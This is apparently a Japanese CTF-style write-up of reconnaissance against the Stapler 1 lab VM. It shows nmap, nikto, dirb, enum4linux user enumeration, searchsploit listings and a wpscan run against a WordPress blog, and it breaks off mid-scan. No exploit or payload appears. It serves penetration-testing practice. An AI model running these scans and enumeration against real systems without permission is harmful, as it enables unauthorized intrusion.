Stapler 1

サービス調査

# nmap -p- 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 22:42 EDT
Nmap scan report for 10.10.10.14
Host is up (0.00075s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 08:00:27:ED:2F:88 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 117.87 seconds
# nmap -Pn -p20,21,22,53,80,123,137,138,139,666,3306,12380 -sV --version-all 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 22:46 EDT
Nmap scan report for 10.10.10.14
Host is up (0.00049s latency).

PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open   domain      dnsmasq 2.75
80/tcp    open   http        PHP cli server 5.5 or later
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.80%I=9%D=5/11%Time=5EBA0DFF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1350,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:ED:2F:88 (Oracle VirtualBox virtual NIC)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds

何かzipぽいバイナリが見えるけどどうやって変換するか分からん。

気になりどころ

• [port 21] ftp vsftpd 2.0.8 or later
• [port 22] ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
• [port 53] domain dnsmasq 2.75
• [port 80] http PHP cli server 5.5 or later
• [port 139] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
• [port 666] open doom?
• [port 3306] mysql MySQL 5.7.12-0ubuntu1
• [port 12380] http Apache httpd 2.4.18 (Ubuntu)

はじめてのwellknown port外サービス検出。
doom?

詳細

[port 21] ftp vsftpd 2.0.8 or later

今回は珍しくftpのバージョンが曖昧。

# ftp 10.10.10.14
Connected to 10.10.10.14.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220 
Name (10.10.10.14:root): 
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> ls
530 Please login with USER and PASS.
ftp: bind: Address already in use
ftp> exit
221 Goodbye.

ftpのログインはダメだったが、何かのヒントらしきものが見える。

[port 22] ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

user enumしても分からん。

[port 53] domain dnsmasq 2.75

dnsサーバはアプローチが全く分からん。

# searchsploit dnsmasq
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                       |  Path
                                                                                                                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference                                                                                                                                            | exploits/windows/dos/9617.txt
Dnsmasq < 2.78 - 2-byte Heap Overflow                                                                                                                                                                | exploits/multiple/dos/42941.py
Dnsmasq < 2.78 - Heap Overflow                                                                                                                                                                       | exploits/multiple/dos/42942.py
Dnsmasq < 2.78 - Information Leak                                                                                                                                                                    | exploits/multiple/dos/42944.py
Dnsmasq < 2.78 - Integer Underflow                                                                                                                                                                   | exploits/multiple/dos/42946.py
Dnsmasq < 2.78 - Lack of free() Denial of Service                                                                                                                                                    | exploits/multiple/dos/42945.py
Dnsmasq < 2.78 - Stack Overflow                                                                                                                                                                      | exploits/multiple/dos/42943.py
Web Interface for DNSmasq / Mikrotik - SQL Injection                                                                                                                                                 | exploits/php/webapps/39817.php
dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)                                                                                                                                        | exploits/linux/dos/48301.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

たぶん無し？

[port 80] http PHP cli server 5.5 or later

phpのhttpは珍しい気がする。

# nikto -h 10.10.10.14
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2020-05-11 23:29:07 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-05-11 23:29:31 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

「.bashrc」とかあるし、ユーザのホームディレクトリで動いてる？

# dirb http://10.10.10.14

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 11 23:33:56 2020
URL_BASE: http://10.10.10.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.14/ ----
+ http://10.10.10.14/.bashrc (CODE:200|SIZE:3771)                                                                                                                                                                                            
+ http://10.10.10.14/.profile (CODE:200|SIZE:675)                                                                                                                                                                                            
                                                                                                                                                                                                                                             
-----------------
END_TIME: Mon May 11 23:34:07 2020
DOWNLOADED: 4612 - FOUND: 2

とりあえず、「.bashrc」が気になる。

$ cat bashrc 
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar

# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color|*-256color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
    # We have color support; assume it's compliant with Ecma-48
    # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
    # a case would tend to support setf rather than setaf.)
    color_prompt=yes
    else
    color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi

# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'

# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

chrootの脆弱性を見たことがあるので何かあるかもしれない。
ついでに、「.profile」

$ cat profile 
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
    . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

どっちみち、shellが取れないと有用ではなさそう。 php cli serverの脆弱性も上手く見つけられないので詰みかな。

[port 139] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

# enum4linux 10.10.10.14
(snip) ====================================================================== 
|    Users on 10.10.10.14 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
(snip)
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
(snip)

残念ながらSambaのバージョンは分からなかったけど、 userは色々見つけた。 以上。 本当はmetasploit使えば新たな展開があるだろうけど、あまり頼りたくない。

[port 666] open doom?

doom?
調べたらまさかのゲームの「DOOM」のプロトコル？ マジか？
とりあえずexploit探したけれど見つからず。
そういえば、nmapで確認したときに出てきた謎バイナリport 666から来てたような
firefoxでport 666を開くと文字化けが表示され、curlしてみたら「HTTP 0.9なので無理」と言われた。
仕方が無いので、firefoxでダウンロードする。とりあえず、「data.zip」というファイル名でダウンロードしてみたところ

# file data.zip 
data.zip: Zip archive data, at least v2.0 to extract

やはりzip

# unzip data.zip 
Archive:  data.zip
  inflating: message2.jpg            
# file message2.jpg 
message2.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 364x77, components 3

画像を表示してみると

~$ echo Hello World.
Hello World.
~$
~$ echo Scott, please change this message
segmentation fault

という謎メッセージが。うーむ。

# exiftool message2.jpg 
ExifTool Version Number         : 11.94
File Name                       : message2.jpg
Directory                       : .
File Size                       : 13 kB
File Modification Date/Time     : 2016:06:03 11:03:07-04:00
File Access Date/Time           : 2020:05:12 00:22:45-04:00
File Inode Change Date/Time     : 2020:05:12 00:22:21-04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 72
Y Resolution                    : 72
Current IPTC Digest             : 020ab2da2a37c332c141ebf819e37e6d
Contact                         : If you are reading this, you should get a cookie!
Application Record Version      : 4
IPTC Digest                     : d41d8cd98f00b204e9800998ecf8427e
Image Width                     : 364
Image Height                    : 77
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 364x77
Megapixels                      : 0.028

cookie? すごいヒントなのかもしれないが何のcookieなのか分からん。

[port 3306] mysql MySQL 5.7.12-0ubuntu1

ここまで、mysqlの手がかりは特に無かったのでログインできず。

[port 12380] http Apache httpd 2.4.18 (Ubuntu)

# nikto -h 10.10.10.14 -p 12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2020-05-12 00:47:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '10.10.10.14' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8019 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2020-05-12 00:52:42 (GMT-4) (298 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

今まで悩んでいたのは何だったんだというぐらいの大判振る舞い

# dirb http://10.10.10.14:12380

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue May 12 00:54:06 2020
URL_BASE: http://10.10.10.14:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.14:12380/ ----
                                                                                                                     
-----------------
END_TIME: Tue May 12 00:55:14 2020
DOWNLOADED: 4612 - FOUND: 0

そろそろdirbからの乗り換え時期だろうか。
では、「robots.txt」から確認していく。
firefoxでport 12380にアクセスしてみる。
wordpressぽいデザインを使ったページが返ってきた。
しかし、「robots.txt」は表示されずホームページが返ってきた。
何故？
仕方が無いので「/admin112233/」,「/blogblog/」,「/phpmyadmin/」を見ていくことにする。
また、ホームページが返ってきた。
何を要求してもホームページしか返さない使命を持っているようだ。
何でだぁ。

---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2020-05-12 00:47:44 (GMT-4)
---------------------------------------------------------------------------

そういえばniktoの結果にこんなのあったな。
おかしいなぁhttpsじゃない...のに...?
それじゃん。

# curl -k https://10.10.10.14:12380/robots.txt
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

firefoxでもhttpsならホームページ以外を見れるようになった。
curlだと証明書が無く、無理に接続するときは-kオプション。
改めて、「/admin112233/」,「/blogblog/」,「/phpmyadmin/」を見ていく。
「/admin112233/」を見ると

This could of been a BeEF-XSS hook;)

とalert()ぽいのが表示された。
何を言っているのかよく分からないが、誰か「beef-xss」でも使っていたのかね。
「/admin112233/」を見ると、wordpressぽいブログが表示される。
とりあえず脳死でLog in admin/adminをしたが通らず。
やっと真面目にwpscanの活躍するときが来たか。

# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog -e at,ap,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: https://10.10.10.14:12380/blogblog/ [10.10.10.14]
[+] Started: Tue May 12 03:34:51 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.18 (Ubuntu)
 |  - Dave: Soemthing doesn't look right here
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://10.10.10.14:12380/blogblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] https://10.10.10.14:12380/blogblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Registration is enabled: https://10.10.10.14:12380/blogblog/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: https://10.10.10.14:12380/blogblog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://10.10.10.14:12380/blogblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
 | Found By: Rss Generator (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
 |  - https://10.10.10.14:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2019-12-08T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.4.4
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:31 <===================================> (20900 / 20900) 100.00% Time: 00:00:31
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] bhost
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2019-12-08T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.4.4
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/, status: 500
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/bhost/style.css, Match: 'Version: 1.2.9'

[+] creative-blog
 | Location: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/
 | Last Updated: 2020-03-01T00:00:00.000Z
 | Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/readme.txt
 | [!] The version is out of date, the latest version is 1.1.3
 | Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/style.css
 | Style Name: Creative Blog
 | Style URI: http://napitwptech.com/themes/creative-blog/
 | Description: Creative Blog is an extremely creative WordPress theme to create your own personal blog site very ea...
 | Author: Bishal Napit
 | Author URI: http://napitwptech.com/themes/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.10.10.14:12380/blogblog/wp-content/themes/creative-blog/, status: 500
 |
 | Version: 0.9 (80% confidence)
